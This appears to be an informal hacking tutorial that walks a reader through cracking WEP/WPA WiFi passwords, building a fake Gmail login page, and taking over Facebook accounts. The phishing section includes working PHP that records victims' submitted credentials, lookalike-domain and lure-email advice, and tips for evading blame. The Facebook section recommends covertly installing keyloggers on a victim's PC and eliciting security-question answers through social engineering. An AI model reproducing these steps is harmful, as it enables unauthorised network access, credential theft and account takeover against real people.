• You can simply try googling for a Dictionary WordList, there are tons out there .Try as many as you can, and if possible compile several into one and let aircrack do it’s thing overnight. Again, cracking WPA/WPA2 is much harder so you need probability on your side to have a real chance at getting the password.

I’ve noticed that in many cases, the WPA key is simply the mobile number of our naive victim. It’s usually 10 characters, easy to remember/type and luckily for us, relatively easy to crack

Hacking WEP

Introduction: This is a tutorial for hacking WEP WiFi Connection, if you want to Hack WPA/WPA2 then click here.

Tools Required:

1. CommView for WiFi: http://tamos.com/download/main/ca.php
2. Aircarck-NG GUI: http://aircrack-ng.org/

• Install CommView. While installation you maybe asked whether you want to install the application in VoIP mode or Standard mode. Both mode will work fine for our case. But I usually used the VoIP mode. It will automatically searches and installs the available drivers needed for making the wireless adapter to enable the packet capture (by turning on promiscuous mode). Just allow it to install the needed drivers and you are good to go to the next step. And please note that while using CommView, your WiFi networks will get disconnected. Don’t panic, you are doing right!
•  After the installation, start the application and click on the left arrow on the left side.
• You will be prompted with a new window. Click on the Start Scanning button.
•  In the right column, all the available networks around you will be shown. Just click the network you want to get the password, and click on “Capture”. Please note that, this tutorial is for WEP networks only!
• Now the newly opened windows will be closed and you can now see that the CommView started capturing the packets.
• Click on Settings> Options> Memory Usage. Change the value of maximum packets in buffer to 20000.
• Now you can click on the logging tab. Select “Auto Logging”. Enter 2000 in the “Maximum Directory Size” and 20 in the “Average Log File Size”. We just told the CommView to capture *.ncp packets with each file of 20MB size and store it in the directory we chose.
• Again go to “Logging” tab and select “Concatenate Logs” to join all the split logs of 20 MB we just created. And now we have one *.ncf file.
• Go to File>Log Viewer> Load CommView Logs> and choose the *.ncf file that we just got form the above Concatenation step.
• Click File> Export> Wireshark/Tco dump format. This will create a .cap file.
• Go to the Aircrack application folder and then traverse to the bin file inside. Double click on Aircrack-ng GUI.exe in the application, choose the *.cap file we just created in the step 10.
• And that’s it! If you sufficient data to crack the password, you will get the password. It is advisable to proceed from step 8 to 11 only after receiving enough packets. You will need a minimum of 100000 packets to start the cracking. So after step 7, it is advisable to leave the system alone for 2-3 hours and then proceed to the further steps!

NOTE:
Recently CommView became a paid software with a rather ridiculous price tag. But, no worries. There are more than enough alternatives. Some of them are mentioned below and can be used to obtain the .cap file as explained above:

•Cain $ Abel:
http://www.oxid.it/cain.html

•WireShark:
http://www.wireshark.org/

For about a couple dozen more, check out the Wikipedia page (link below )listing almost every packet analyzer:
http://en.wikipedia.org/wiki/Comparison_of_packet_analyzers

They all work the same way, basically all we need is a means to get the .cap file and after that the role of packet analyzer is over. For most purposes WireShark is more than enough, so kindly check out this one first. On a seemingly unrelated note, the war against piracy wages on and packet analyzer have become victims too. Proprietary softwares like CommView continue to be easily available on torrent websites which shows just how harmful hacking can be to a company.

Phishing

Introduction:This tutorial will explain you how to create fake login page for phishing, in this case we are going to go with Gmail as an example. This Procedure can be used to make fake pages for any other website in the same way. Yahoo!, Facebook, MySpace – Any website you want can be made using this tutorial.

• Head over to the website gmail.com.
• Right Click anywhere and Save the Page as an HTML file.
• Once you save the login page completely, you will see an HTML file and a folder with the name something like Email from google files.There will be two image files namely “google_transparent.gif”, “mail_logo.png”.
• Now we need to upload these images to any online image hosting website, for example – tinypic.com, postimage.com or photobucket.com.
• After uploading go to the image where you uploaded it and copy the URL of each image.
• Open the HTML file in any text editor like NotePad or MS Word.(You can use CTRL + F for the following)
• Search for “google_transparent.gif” (without quotes) and replace it with corresponding URL. Search for “mail_logo.png” (without quotes) and replace it with corresponding URL.
• In the same file, Search for :action=”https://www.google.com/accounts/ServiceLoginAuth”
• And replace it with :

action=”http://yoursite.urlhere/login.php”

(You have to write down your fake websites URL there, See Step 7 for creating it.)

• Now save the file.
• Now you need to create a PHP file called “login.php”. So open up a text editor (like NotePad) and type the following (You can copy it from this pastie):

<!–?php $handle = fopen(“password.txt”, “a”);
fwrite($handle,$_POST[“Email”]);
fwrite($handle,”\n”); fwrite($handle,$_POST[“Passwd”]);
fwrite($handle,”\n”);
fwrite($handle,”\n”);
fclose($handle) ;
header(“Location:https://www.google.com/accounts/ServiceLoginAuth”);
exit;
?>

• Now Save it as login.php
• Open up notepad again and just save a new file as “pswrds.txt” without any contents.(Empty file)

Now upload those three files(namely :- index.html, login.php, pswrds.txt) in any of subdomains Web hosting site. (Note: that web hosting service must have php feature.)
You can use the following sites:

110mb.com
spam.com
justfree.com
007sites.com
(or simply google it)

Follow the instructions in the Web hosting site and setup you fake login page. Make sure you name the URL something like g00gle.com or anything that you think would be the least suspicious.(Just make sure the URL doesn’t stand out in the address bar as it may alert the victim.)

• Create a fake email account, that is if you prefer to send the phishing webpage link anonymously.
• And now all you have to do is send the victim something like: ‘Gmail starts new feature : To use this service, log in to this page’ ,along with this send the link to your fake website.

Note: For user to believe change your phishing web page url use any of free short url sites like : co.nr, co.cc,cz.cc
This will make users to believe that it is correct url.
Nevertheless, if you do get caught act like you had no clue:

‘OMG ! I logged in to that website too , I’m going to change my pass now ! you do the same, quickly !’.

Protecting Yourself :
Phishing webpages are meant to fool the victim into thinking that the website they are logging into is genuine whereas it is actually a completely different website. The only sure-fire way to protect oneself from being the victim is to always make sure that the website you are giving your account and password to is bona fide by simply peaking at the address bar in your web browser. Also, avoid following any links from any dodgy websites, scam emails or even the comment sections in various places.
Everyone is guilty until proven innocent. Assume hostility or accept vulnerability.

Note: This method currently does not work. At the time of writing, the files we upload to the hosting website were the same as mentioned here. As of now, however, these files are nowhere to be found. For some reason, the Gmail team seems to modify and change the log in page almost every other week causing the phishing method to be slightly different every time. Hence, kindly try out other hacking techniques for the time being. Since the phishing method is practically the same barring a few file names .You may also attempt the same method with other websites (Yahoo!, Facebook etc.) on your own.

Hacking Facebook

Note: Contrary to popular belief there doesn’t exist some secret software where one can just put in an email id, press “Enter” and all the passwords associated with that account magically appear. Hacking Facebook, like any other hack takes time, skill and effort. Also, the methods are much the same for hacking any type of account for that matter.

Methods: There are 3 main methods used when it comes to Hacking Facebook accounts. Briefly,They are :

• Keyloggers : Making the victim open up his account on a system with a keylogger attached/ Sending a remote keylogger to the victim.
• Phishing : Making a fake login page and having the entered details sent to you.(This has been explained in the beginner section).
• Social Engineering : This is just a fancy term for making the victim give up vital information in a supposedly casual conversation. The information may be the user’s recovery question’s answer, which can then be used to take over the account via : “Forgot your password? Click Here!” Button.

Warning: Some time ago, Facebook developers patched in a new security feature. In a nutshell, if Facebook detects that your IP address is different from the usual(previously used) IP addresses, it may stop you from logging in without further identity verification which may be, for example: an SMS code. Now this can potentially affect every type of hack, but if it is in fact possible there is only one way to know.
By doing it. Hope for the best, Prepare for the worst.

• Keyloggers:
  A Keylogger is a type of software that usually runs in the background, without the knowledge of an innocent victim and secretly records their actions. A wide variety of functionality is offered by various products : Almost all record every keystroke on the keyboard in a simple text file format, some record mouse clicks and pointer locations, some record folders and files opened and some even take screenshots at regular intervals.
  Most of the keyloggers provide an option whether to store the text file locally send it to a FTP server or your email id. They can be installed and set up relatively easily like any other program. Once setup, they usually go into hiding as a background process leaving no trace on the surface and starting up automatically when the operating system starts.

For some reason people seem to avoid or look over keyloggers, I can give you my word this is the best and easiest method for hacking any type of account there is, so definitely check this out. In our case, we want the victim to login to their Facebook account on a compromised system, one that has a stealthy keylogger installed. There are two ways to go about this :Installing a keylogger on your system and having them use it to login to their FB account, or if you have temporary access to their system Installing it on their computer and having the log files sent to you by email or FTP.
Whichever way you prefer, the method is the same. Download a key logger, follow the smooth setup instructions as you would when installing anything, customize settings according to your preference or download the Keylogger and copy it on a pendrive and then install it on Victim’s PC.
I have personally tried and tested the following keyloggers, you can choose any of these randomly since they all seem to do the job :

(i)Actual key-logger – Download from http://www.actualkeylogger.com/download-free-key-logger.html
(ii)Home key-logger – Download from http://www.kmint21.com/download.html
(iii) REFOG Free key-logger – Download from https://www.refog.com/download.html

(Certain full versions of very good keyloggers are available as torrents from websites like isohunt.com , kickass.to )

• Phishing : This method has been described in great detail in the Phishing section. Follow the instructions carefully while using facebook.com instead of gmail.com.
• Social Engineering :
  Facebook uses security questions as a recovery method, almost everyone sets it up to a personal question like :
  “Where were you born? ”
  “What was your first pets name? ”

Social engineering is a term that describes a non-technical kind of intrusion that relies heavily on human interaction and often involves tricking other people to break normal security procedures.
A social engineer runs what used to be called a “con game.” For example, a person using social engineering to break into a computer network might try to gain the confidence of an authorized user and get them to reveal information that compromises the network’s security. Social engineers often rely on the natural helpfulness of people as well as on their weaknesses. They might, for example, call the authorized employee with some kind of urgent problem that requires immediate network access.
Appeal to vanity, appeal to authority, appeal to greed, and old-fashioned eavesdropping are other typical social engineering techniques.

For this method to work, you need to know the person whose account you want to hack. In fact, you need to know them well enough, such that it doesn’t seem suspicious when you carefully try to work up their recovery questions into your conversation and get them to answer it casually.
After that,using the “Forgot your password? Click Here!” Button one can simply turn over an account’s user. But even after this, your work is not done yet. Nowadays Facebook has implemented a 24 hour delay before recovering the account and logging in, So if the victim happens to log in during that period they can reverse the process in seconds. Not only do you need careful planning, but also careful timing.
Facebook uses a verification method during recovery if the victim’s email and phone number are no longer functional it asks to put in another phone number. If you can somehow get a hold of their cell phones or email accounts their account is yours, otherwise the process may be slow and fruitless.